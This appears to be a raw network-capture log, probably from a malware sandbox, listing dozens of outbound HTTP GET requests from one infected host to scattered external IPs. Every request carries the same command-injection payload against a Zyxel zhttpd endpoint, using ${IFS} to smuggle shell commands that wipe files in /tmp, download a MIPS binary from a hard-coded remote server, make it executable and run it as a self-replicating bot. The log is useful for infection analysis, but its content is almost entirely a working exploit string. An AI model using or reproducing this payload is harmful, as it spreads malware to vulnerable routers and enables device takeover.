                                                Jan 12, 2024 18:24:48.147151947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7435192.168.2.1352722182.136.166.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147185087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7436192.168.2.135273649.214.158.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147237062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7437192.168.2.1356744194.174.42.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147264957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7438192.168.2.1332844134.249.229.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147299051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7439192.168.2.134649686.113.46.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147335052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7440192.168.2.1350678216.119.218.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147397041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7441192.168.2.1350896169.78.226.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147432089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7442192.168.2.134253825.22.36.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147465944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7443192.168.2.1358862114.18.64.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147486925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7444192.168.2.134122063.229.97.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147535086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7445192.168.2.135646649.114.95.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147567987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7446192.168.2.1349832134.86.240.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147617102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7447192.168.2.134048051.88.181.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147650003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7448192.168.2.135684642.33.54.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147701025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7449192.168.2.1344206103.80.166.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147742033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7450192.168.2.1344198121.53.10.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147769928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7451192.168.2.134302613.185.254.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147823095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7452192.168.2.1339280171.252.107.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147860050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7453192.168.2.1359942160.29.138.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147890091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7454192.168.2.134181294.103.9.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147919893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7455192.168.2.134809419.66.149.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147962093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7456192.168.2.1338444173.15.201.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.147996902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7457192.168.2.1342444178.47.154.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148036003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7458192.168.2.1335786164.221.59.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148073912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7459192.168.2.1335922158.80.98.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148123026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7460192.168.2.134779036.144.205.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148175001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7461192.168.2.135688839.8.126.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148195028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7462192.168.2.134203275.78.159.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148238897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7463192.168.2.1333742204.113.62.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148294926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7464192.168.2.135350068.85.154.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148351908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7465192.168.2.1349330185.201.42.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148376942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7466192.168.2.1343400175.245.13.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148408890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7467192.168.2.133532477.127.219.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148443937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7468192.168.2.134520641.187.26.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148499012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7469192.168.2.135312880.39.71.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148525000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7470192.168.2.1339734140.253.27.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148560047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7471192.168.2.1358032142.160.21.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148618937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7472192.168.2.1336150119.133.20.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148648024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7473192.168.2.13374361.208.124.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148675919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7474192.168.2.135248496.169.90.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148734093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7475192.168.2.1336948217.11.149.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148750067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7476192.168.2.135586261.165.69.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148824930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7477192.168.2.1353122166.56.5.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148847103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7478192.168.2.134573657.21.41.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148864031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7479192.168.2.134718218.155.158.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148915052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7480192.168.2.134758257.163.179.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.148973942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7481192.168.2.1341956101.189.21.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149005890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7482192.168.2.133305893.189.52.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149053097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7483192.168.2.1342564140.26.230.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149111986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7484192.168.2.133532227.14.55.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149122000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7485192.168.2.1348430210.51.68.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149180889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7486192.168.2.133569635.73.254.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149190903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7487192.168.2.1349702120.36.239.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149255991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7488192.168.2.1350988183.229.162.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149290085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7489192.168.2.1339348184.15.246.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149346113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7490192.168.2.1353156108.44.42.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149391890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7491192.168.2.133296836.230.120.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149441957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7492192.168.2.134795666.83.13.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149470091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7493192.168.2.1356220112.60.135.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149501085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7494192.168.2.133679651.111.44.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149538040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7495192.168.2.133324078.72.214.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149580956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7496192.168.2.135929877.253.4.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.149604082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7497192.168.2.133566849.105.192.192443
                                                TimestampBytes transferredDirectionData
